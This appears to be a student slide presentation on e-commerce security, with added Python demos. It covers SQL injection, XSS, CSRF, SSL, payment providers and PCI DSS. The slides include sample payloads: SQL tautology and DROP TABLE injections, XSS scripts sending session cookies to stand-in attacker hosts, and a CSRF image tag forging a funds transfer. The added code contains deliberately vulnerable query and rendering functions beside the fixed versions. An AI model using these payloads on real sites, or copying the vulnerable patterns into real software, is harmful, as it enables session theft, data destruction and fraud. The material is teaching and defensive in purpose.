Web shop security Zlatan Filipusic, Arman Nasufovic, Arturo Quesada Gil, Andres Reyes Navas and Jimmy Sjöstrand


User Developer / Admin

Web shop security

User perspective

• Seller's trustworthiness
• Secure web site – https
• Passwords
• Viruses / Spyware
• Cookies

Payment options

•Credit Card

•Direct internet bank payment

Electronic credit card, E-card

• limited time
• limited money

Developing secure homepages

• SSL / https
• PSP
• 3D Secure
• PCI DSS

Hacking & Cracking

Social Engineering

Policies

Physical Security

VULNERABILITIES IN E-COMMERCE: INTRODUCTION


E-commerce grows exponentially, principally B2B and B2C. The Internet must provide the communication at the right time and in the right way. As an enterprise's profits grow because it offers its services better and faster than its competitors, along the same lines:

• Information is MORE SENSITIVE and MORE DANGEROUS in the wrong hands: "Customer information is like gold to marketers".

• INTERNET SERVICES are growing exponentially too:
  more COMPLEX software == more PROBLEMS DEVELOPING software
  + More FAST DEVELOPING == more POOR SECURITY implementation
  + LACK of KNOWLEDGE concerning how TO SECURE the customer's personal information
  == WEAKNESSES IN SECURING INFORMATION ARE INCREASING

"Your system is only as secure as the people who use it"

VULNERABILITIES IN E-COMMERCE: THE GENERAL CONTEXT

The software environment of web applications is NOT implemented relying on a SECURITY DESIGN:

Programmers are not well trained in secure programming techniques
• Weak mechanisms to ensure sanitized inputs and outputs (e.g. improper input validation, improper escaping and structuring of output)

Designers don't specify an independent and restricted environment for the application
• Undefined policies for restricting the software environment:
  Run privileges → total control of the software environment
  Error messages → disclosure of the software architecture and implementation
  Virtualization → the impact of attacks spreads further into the software environment
• Relying on Security through Obscurity: software protection mechanisms that rely on secrecy == exploitable by reverse engineering
• Trustworthiness in third-party software

Maintainers and managers don't assess and implement security across the whole software lifecycle
• Misuse of automated/static and manual/dynamic analysis (e.g. fuzzers, scanners, pen testing)

RESULT: "You can't effectively and consistently manage what you can't measure, and you can't measure what you haven't defined…" → SOFTWARE WEAKNESSES

VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES

"INJECTION"

INJECTION attacks happen when untrusted data is sent to an interpreter as part of a command or query.

The attacker's modified data can mislead the interpreter (in the back-end database) into:
• executing unintended commands, or
• accessing unauthorized data

Two front-end application injection attacks:
1. Incorrectly filtered escape characters
2. Incorrect type handling

One back-end application injection attack:
1. Blind injection

VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES

"INJECTION EXAMPLES"

1. Incorrectly filtered escape characters

• The next statement is crafted by the attacker so that it always evaluates to true:

SELECT * FROM users WHERE name = '' OR '1' = '1'

• With this statement the attacker can force the selection of a valid user name, breaking the authentication procedure.

2. Incorrect type handling

• The input field is not type-constrained (strongly typed), so the attacker can craft the next query:

SELECT * FROM userinfo WHERE id = " + type_not_constrained_input_value + ";"

• Crafting this statement by introducing: 1;DROP TABLE `users`

SELECT * FROM userinfo WHERE id = 1;DROP TABLE `users`;

• With this statement the attacker deletes the users table in the database, so the integrity of the data has been compromised.

VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES

"INJECTION EXAMPLES"

3. Blind injection

The attacker introduces conditional queries in order to reveal information that is not disclosed at first, using error messages and database responses to find any possible injection attack attempts.

A typical attempt:

• The attacker has this information:

http://shopping_site.com/items.php?id=2
SELECT title, description, body FROM items WHERE ID = 2

• He/she sends the next query to the database:

http://shopping_site.com/items.php?id=2 and 1=2
SELECT title, description, body FROM items WHERE ID = 2 AND 1=2

• If the attacker receives a different page from the database, he/she knows that the database is vulnerable to injection.
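The three injection cases from the slides above, first built by string concatenation as the slides show them and then with type constraints and bound parameters, as an added Python example that is not part of the original presentation; the in-memory database, its sample rows and the function names are constructed for the demonstration, and sqlite3's executescript() stands in for a database driver that accepts stacked statements.

```python
import sqlite3

# Constructed sample data for an in-memory shop database (not from the slides).
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]
SAMPLE_USERINFO = [(1, "alice@example.com"), (2, "bob@example.com")]
SAMPLE_ITEMS = [(2, "Desk lamp", "LED desk lamp", "Full description text")]


def make_db():
    """Create the in-memory database with the three tables the slides query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("CREATE TABLE userinfo (id INTEGER, email TEXT)")
    conn.execute("CREATE TABLE items (id INTEGER, title TEXT, description TEXT, body TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO userinfo VALUES (?, ?)", SAMPLE_USERINFO)
    conn.executemany("INSERT INTO items VALUES (?, ?, ?, ?)", SAMPLE_ITEMS)
    return conn


def table_exists(conn, name):
    """True if a table of that name still exists (used to observe the DROP TABLE case)."""
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


# Example 1 on the slides: incorrectly filtered escape characters.

def find_user_vulnerable(conn, name):
    """Query built by string concatenation: a quote inside `name` ends the literal."""
    sql = "SELECT * FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name):
    """Same lookup with a bound parameter: the value can never become SQL syntax."""
    return conn.execute("SELECT * FROM users WHERE name = ?", (name,)).fetchall()


# Example 2 on the slides: incorrect type handling.

def userinfo_vulnerable(conn, id_value):
    """`id` is pasted in unquoted and untyped, so a stacked statement rides along.

    Python's sqlite3.execute() refuses more than one statement per call, so
    executescript() stands in for a driver that runs stacked statements,
    which is the situation the slide assumes.
    """
    sql = "SELECT * FROM userinfo WHERE id = " + id_value + ";"
    conn.executescript(sql)


def userinfo_safe(conn, id_value):
    """Constrain the type first, then bind: non-integers never reach the database."""
    try:
        numeric_id = int(id_value)
    except ValueError:
        return None  # rejects "1;DROP TABLE `users`" and the blind probe "2 and 1=2"
    return conn.execute("SELECT * FROM userinfo WHERE id = ?", (numeric_id,)).fetchone()


def item_safe(conn, id_value):
    """items.php?id=... from the blind-injection slide, handled the same way."""
    try:
        numeric_id = int(id_value)
    except ValueError:
        return None
    return conn.execute(
        "SELECT title, description, body FROM items WHERE id = ?", (numeric_id,)
    ).fetchone()


def run_demo():
    """Run every path against a fresh database and report what each one did."""
    conn = make_db()
    results = {
        "tautology_rows_vulnerable": len(find_user_vulnerable(conn, "' OR '1'='1")),
        "tautology_rows_safe": len(find_user_safe(conn, "' OR '1'='1")),
        "blind_probe_safe": item_safe(conn, "2 and 1=2"),
        "drop_safe": userinfo_safe(conn, "1;DROP TABLE `users`"),
        "users_before": table_exists(conn, "users"),
    }
    userinfo_vulnerable(conn, "1;DROP TABLE `users`")
    results["users_after"] = table_exists(conn, "users")
    return results
```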

VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES

"INJECTION" (OWASP TOP TEN 2010)

[Figure: OWASP Top Ten 2010 injection illustration. Network layer: Firewall, Hardened OS, Web Server, App Server, Firewall. Application layer: Custom Code in front of Databases, Legacy Systems, Web Services, Directories, Human Resrcs, Billing. Business functions: Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce, Bus. Functions. An APPLICATION ATTACK flows HTTP request → SQL query → DB Table → HTTP response, carrying the query "SELECT * FROM accounts WHERE acct='' OR 1=1--'", and an Account Summary panel shows the leaked account numbers.]

1. Application presents a form to the attacker
2. Attacker sends an attack in the form data
3. Application forwards attack to the database in a SQL query
4. Database runs query containing attack and sends encrypted results back to application
5. Application decrypts data as normal and sends results to the user

VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES

"XSS"

XSS (Cross Site Scripting) attacks occur when a web app takes unsanitized, attacker-supplied data and sends it to a user's web browser.

Through the web app, attackers can execute scripts in the user's browser in order to:
• Obtain session cookies.
• Redirect the user to other malicious sites.
• Bypass access control mechanisms (like the same-origin policy).

There are 3 principal variants:
• Non-persistent attack
• Persistent attack
• DOM-oriented attack

This vulnerability relies on the trust the user's browser puts in the web app.

VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES

"XSS NON-PERSISTENT"

A non-persistent attack requires that the user visit a crafted link or an object containing malicious code.

Example: "This attack performs a theft of the user's authorization when the user is required to introduce the credit card number, in order to obtain access to a web server by stealing the user's session ID."

1. The attacker catches the server's unvalidated response to the request sent by the user:

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

2. The attacker introduces the embedded code in order to redirect the user's session ID to an untrusted web site. He/she uses the "CC" field:

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'

3. The attacker receives the user's session ID at the malicious site and can impersonate the "user's browser".

VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES

"XSS PERSISTENT AND DOM-ORIENTED ATTACK"

A persistent attack uses the web site itself to inject the code into the user.

• Viewing some information crafted into JavaScript, the attacker can introduce this piece of embedded code:

<SCRIPT>
document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie
</SCRIPT>

A DOM-oriented attack can instigate the user's browser to execute pieces of a modified DOM controlled by the attacker.

• In this case, the embedded malicious code can steal the user's session cookie by forcing the user to click:

http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script>
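The reflected credit-card field and the welcome.html?name= case from the XSS slides above, rendered first as the slides show them and then with context-aware escaping, plus the Set-Cookie attributes that keep the session ID out of document.cookie, as an added Python example that is not part of the original presentation; the function names and the cookie name are assumptions.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The two payloads from the slides (the reflected and the DOM-based example).
REFLECTED_PAYLOAD = (
    "'><script>document.location="
    "'http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'"
)
DOM_URL = "http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script>"


def render_cc_field_vulnerable(cc):
    """The slide's JSP line, transliterated: the CC parameter is pasted into the attribute."""
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"


def render_cc_field_safe(cc):
    """Escape for the attribute context: quote=True turns ' into &#x27;, so the
    attribute cannot be closed early and no <script> tag can be opened."""
    return "<input name='creditcard' type='TEXT' value='" + html.escape(cc, quote=True) + "'>"


def welcome_name(url):
    """DOM-based case: the name taken from welcome.html?name=... is escaped before use."""
    name = parse_qs(urlsplit(url).query).get("name", [""])[0]
    return html.escape(name, quote=True)


def session_cookie_header(session_id):
    """HttpOnly keeps the session ID out of document.cookie, which is exactly what the
    payloads above exfiltrate; Secure and SameSite limit where the cookie travels."""
    if not session_id.isalnum():
        raise ValueError("session id must be alphanumeric")
    return "Set-Cookie: SESSIONID=" + session_id + "; HttpOnly; Secure; SameSite=Lax; Path=/"


def contains_script_tag(markup):
    """Crude check for the tag the payloads rely on (case-insensitive)."""
    return "<script" in markup.lower()
```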

VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES

"CSRF"

CSRF (Cross Site Request Forgery) attacks exploit the trust that the web app puts in the user's browser.

These attacks force an authenticated user of a web site to send requests to a server without any knowledge by the user.

Web servers are often designed to receive "trusted" requests from trusted users without any control mechanism to verify whether they are intended requests:
• The attacker can trick the web site into treating unintended requests made by the user as "trusted requests".

CSRF together with XSS is a bigger threat, because XSS can be used as the base for a CSRF attack operating under the "same-origin policy" (2 trusted places = same domain and same protocol).

VULNERABILITIES IN E-COMMERCE: DIFFERENT TECHNIQUES APPROACHING WEAKNESSES

"CSRF ATTACK EXAMPLE"

EXAMPLE: "A user is browsing a vulnerable web site. He/she needs to transfer money to buy a product. The user is authenticated. How can an attacker compromise the user's money with a CSRF attack?"

1. The user makes a request on the web site, and the request's content is clear text:

http://vulnsite.com/app/transferFunds?amount=1500&destinationAccount=4673243243

2. The attacker controls the traffic and can store information on the web site. He/she receives the request, constructs a new request transferring money from the user's account to the attacker's account, embeds this code into an "image tag request" and stores it on the vulnerable web site:

<img src="http://vulnsite.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

3. If the user has stored the cookie with the session info, then while browsing the web site authenticated and "viewing" the image, the embedded forged request will be sent from the user's browser as an "authorized" hidden request.
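A server-side handler for the transferFunds endpoint from the example above that rejects the forged image-tag request while accepting the user's own form submission, as an added Python example that is not part of the original presentation; the session-bound HMAC token, the csrf_token parameter name and the per-process server secret are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed per-process key for binding tokens to sessions (assumption, not from the slides).
SERVER_SECRET = secrets.token_bytes(32)

# The forged request from the slide's <img> tag and the user's genuine request.
FORGED_URL = "http://vulnsite.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#"
GENUINE_URL = "http://vulnsite.com/app/transferFunds?amount=1500&destinationAccount=4673243243"


def csrf_token(session_id):
    """Token the server embeds in the transfer form: HMAC(server secret, session id).
    An attacker who can only make the browser send its cookie cannot compute it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def with_token(url, session_id):
    """Append the session's token to a request URL, as the legitimate form would."""
    return url + "&csrf_token=" + csrf_token(session_id)


def handle_transfer(session_id, url, method):
    """Server-side handler for /app/transferFunds. Returns (accepted, reason)."""
    params = parse_qs(urlsplit(url).query)
    # 1. A state change must not be reachable by the GET that an <img src> issues.
    if method != "POST":
        return False, "rejected: transfers require POST, not a GET from an image tag"
    # 2. The request must carry the token bound to this session; the forged <img>
    #    request never can, because the attacker never sees the token.
    token = params.get("csrf_token", [""])[0]
    if not hmac.compare_digest(token, csrf_token(session_id)):
        return False, "rejected: missing or wrong CSRF token"
    amount = params.get("amount", [""])[0]
    destination = params.get("destinationAccount", [""])[0]
    return True, "transferred " + amount + " to " + destination
```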

VULNERABILITIES IN E-COMMERCE: SOME STATISTICS (FROM 2008)

12186 web applications with 97554 detected vulnerabilities

Social Engineering

Targets | Technique | Consequence | Prevention

Policy Making

• Purpose Statement
• Applicability and Scope statement
• Effective date
• Responsibilities
• Policy Statement
• Background
• Definitions

Physical Security

• Lock up the server rooms
• Set up surveillance
• Make sure vulnerable devices are locked up
• Use rack mount servers
• Don't forget about the workstations
• Keep intruders out of the computer/server case

Physical Security

• Protect portable devices
• Take backups and keep them secure
• Disable the drives
• Protect your printers

SSL: Secure Sockets Layer

• Enables secure data exchange between client and server
• Protocol below the Application layer
• Confidentiality (Encryption)
• Integrity (MAC)

SSL Services

• Fragmentation: divides data into blocks of 2^14 bytes
• Compression: data can be compressed, optional
• Message Integrity: keyed hash function with MAC
• Confidentiality: symmetric key cryptography
• Framing

Handshake

• No handshake, no security
• Enables exchange of keys
• Reduces the risk of Man in the middle attacks
• Setting up parameters

About 10 steps in the handshake:
• What cipher suites and SSL versions are supported
• Client gets the server's public key from the server certificate
• Client creates a pre-master secret and sends it encrypted to the server
• The pre-master secret creates a master secret
• The master secret is then used to create session keys and auth keys

MAC: Message Authentication Code

• A hash using the message and the authentication key
• Used to authenticate the sender of a message
• MAC = Hash(Message + AuthKey)

Putting it all together: exchange of information using SSL
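The key chain the handshake slides describe (pre-master secret to master secret to session and auth keys), the 2^14-byte fragmentation and the keyed-hash MAC over each record, as an added Python example that is not part of the original presentation; the HMAC-SHA256 expansion, the key names and the sequence number in the MAC are assumptions standing in for the real SSL derivation, and encryption with the session keys is left out.

```python
import hashlib
import hmac

HASH = hashlib.sha256
RECORD_MAX = 2 ** 14  # the fragmentation limit from the slides


def prf(secret, label, seed, length):
    """HMAC-SHA256 expansion in the style of a TLS PRF (an assumed simplification,
    not the SSL 3.0 or TLS key derivation itself)."""
    out = b""
    a = hmac.new(secret, label + seed, HASH).digest()
    while len(out) < length:
        out += hmac.new(secret, a + label + seed, HASH).digest()
        a = hmac.new(secret, a, HASH).digest()
    return out[:length]


def derive_keys(pre_master_secret, client_random, server_random):
    """Pre-master secret -> master secret -> session (encryption) keys and auth (MAC)
    keys, the chain the handshake slide describes. Both sides compute this identically."""
    master_secret = prf(pre_master_secret, b"master secret", client_random + server_random, 48)
    key_block = prf(master_secret, b"key expansion", server_random + client_random, 4 * 32)
    return {
        "client_auth_key": key_block[0:32],
        "server_auth_key": key_block[32:64],
        "client_session_key": key_block[64:96],
        "server_session_key": key_block[96:128],
    }


def fragment(data):
    """Fragmentation service: split application data into records of at most 2^14 bytes."""
    return [data[i:i + RECORD_MAX] for i in range(0, len(data), RECORD_MAX)] or [b""]


def record_mac(auth_key, seq, record):
    """Message integrity: the slides' MAC = Hash(Message + AuthKey), done as HMAC over the
    record plus a sequence number so that replayed or reordered records also fail."""
    return hmac.new(auth_key, seq.to_bytes(8, "big") + record, HASH).digest()


def verify_record(auth_key, seq, record, tag):
    """Receiver-side check; compare_digest avoids leaking the tag through timing."""
    return hmac.compare_digest(record_mac(auth_key, seq, record), tag)


def protect(keys, data):
    """Sender side: fragment the data and tag every record with the client auth key."""
    return [(seq, rec, record_mac(keys["client_auth_key"], seq, rec))
            for seq, rec in enumerate(fragment(data))]
```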

SSL Weaknesses

• Cipher suites can be weak
• Man in the middle
• Keyjacking
• Fake certificates

PSP: Payment Service Provider

DEFINITION OF PSP

"PSPs offer merchants online services for accepting electronic payments by a variety of payment methods including credit card, bank-based payments such as direct debit, bank transfer, and real-time bank transfer based on online banking."

• Solution for the problems of connecting the e-market with banks
• 2 different fee policies
• Security

List of PSPs

3D SECURE

DEFINITION OF 3D SECURE

"3D Secure is an XML-based protocol used as an added layer of security for online credit and debit card transactions."

Security: three-domain model for authentication:
• Acquirer Domain
• Issuer Domain
• Interoperability Domain

Based on SET

PCI DSS: Payment Card Industry Data Security Standard

• Security standard to control credit card info
• Defined by the PCI SSC
• Unified from:
  • Visa Card Information Security
  • MasterCard Site Data Protection
  • American Express Data Security Operating Policy
  • Discover Information and Compliance
  • JCB Data Security Program

• Objectives
• Protected and Unprotected Data
• Security techniques

PCI DSS Requirements

• Build and maintain a secure network
  1. Install and maintain a firewall configuration to protect cardholder data.
  2. Do not use vendor-supplied defaults for system passwords and other security parameters.
• Protect cardholder data
  3. Protect stored cardholder data.
  4. Encrypt transmission of cardholder data across open, public networks.
• Maintain a vulnerability management program
  5. Use and regularly update anti-virus software on all systems commonly affected by malware.
  6. Develop and maintain secure systems and applications.
• Implement strong access control measures
  7. Restrict access to cardholder data by business need-to-know.
  8. Assign a unique ID to each person with computer access.
  9. Restrict physical access to cardholder data.
• Regularly monitor and test networks
  10. Track and monitor all access to network resources and cardholder data.
  11. Regularly test security systems and processes.
• Maintain an information security policy
  12. Maintain a policy that addresses information security.